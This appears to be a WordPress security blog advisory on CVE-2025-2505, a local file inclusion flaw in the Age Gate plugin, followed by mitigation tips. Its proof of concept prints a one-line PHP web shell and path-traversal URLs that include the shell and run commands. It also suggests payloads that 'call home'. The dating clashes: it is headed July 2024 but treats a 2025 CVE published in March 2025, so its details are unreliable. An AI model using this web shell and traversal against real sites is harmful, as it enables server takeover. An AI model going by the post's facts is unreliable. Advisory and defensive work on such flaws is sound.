Published: July 2024
*By: WP Security Labs Exclusive*
Summary
A critical vulnerability (CVE-2025-2505) has been discovered in the Age Gate WordPress plugin – one of the most popular plugins for age verification on WordPress sites. All versions up to and including 3.5.3 are affected. This bug allows unauthenticated local PHP file inclusion (LFI), which can let hackers execute arbitrary PHP code on the server with just a simple URL trick.
This post will explain the vulnerability in plain language, show you some code samples, and demonstrate a proof-of-concept (PoC) exploit. We’ll also provide tips for detection and mitigation.
What Is the Vulnerability?
The plugin has a feature for selecting language files via the lang parameter. It fails to properly sanitize input to this parameter. As a result, any user—without logging in—can make the server include and execute any PHP file it can reach on disk.
Bypass normal security and access controls
- Run code by including “PHP-enabled” files uploaded to the site through other vulnerable plugins or uploads
Where’s the Flaw in the Code?
Here’s a *simplified* code snippet to show where things go wrong (from /age-gate/includes/class-age-gate.php):
<?php
// This runs before output
if (isset($_GET['lang'])) {
$lang = $_GET['lang']; // NO VALIDATION!
include "languages/$lang.php"; // User input is put directly in the file path and included!
}
?>
Attackers can easily change the lang parameter value in the URL to include files outside of the intended directory. The plugin doesn’t check for .. or other dangerous characters.
PoC Exploit – How Attackers Break In
Suppose a WordPress site has the plugin enabled, and the web server allows file uploads (as almost all do). Here’s how an attacker could exploit this:
Step 1: Upload a Malicious PHP File
The attacker uploads a PHP file (let’s call it evil.php) using any upload feature on the site—could be a theme customizer, media library, or another vulnerable plugin.
For example, the file content could look like
<?php system($_GET['cmd']); ?>
Now, the attacker crafts a URL like this
http://victimsite.com/?lang=../../uploads/evil
This makes the plugin execute
include "languages/../../uploads/evil.php";
or, depending on WordPress root, possibly
include "/wp-content/uploads/evil.php";
As long as path traversal gets to the right file, it will be executed.
Now, the attacker adds a command to the URL
http://victimsite.com/?lang=../../uploads/evil&cmd=whoami
The PHP will execute whatever is passed in cmd, like creating a new admin user, dumping database credentials, etc.
#### PRO TIP: Even if the plugin doesn’t display errors, attackers can trigger their payload to echo data or call home using file_get_contents.
Impact
If a site uses the Age Gate plugin (up to v3.5.3), it is completely exposed. Attackers don’t need credentials – just the ability to upload any PHP file (which is not hard on many sites), or sometimes even existing files like wp-config.php.
References & Sources
- NVD Database Entry for CVE-2025-2505
- Original Age Gate Plugin
- Wordfence Threat Advisory
- PHP File Inclusion Cheat Sheet – OWASP
- Example Secure Coding Practices to Prevent LFI
How to Protect Your Site
1. Update Immediately
Check if your plugin is at or below 3.5.3. If so, disable and remove it, or update to the version where this is fixed (check the plugin changelog).
2. Restrict Uploads
Limit file uploads to trusted users. Use plugins like Wordfence to scan for unexpected PHP files in uploads.
3. Monitor & Harden
Regularly check your logs for suspicious access to lang parameter and unknown PHP files being requested or executed.
4. Code Review
If you’re a developer, always sanitize user input before using it in file paths to avoid LFI and related attacks.
Conclusion
CVE-2025-2505 is a devastating example of how a small mistake—forgetting to validate a user parameter—can endanger thousands of sites. If you (or your clients) use Age Gate, act now to patch, scan, and secure your installation.
Stay safe and keep your plugins up to date!
*This exclusive write-up was brought to you by WP Security Labs. For more WordPress security alerts and guides, [subscribe to our newsletter](#).*
Timeline
Published on: 03/20/2025 08:15:11 UTC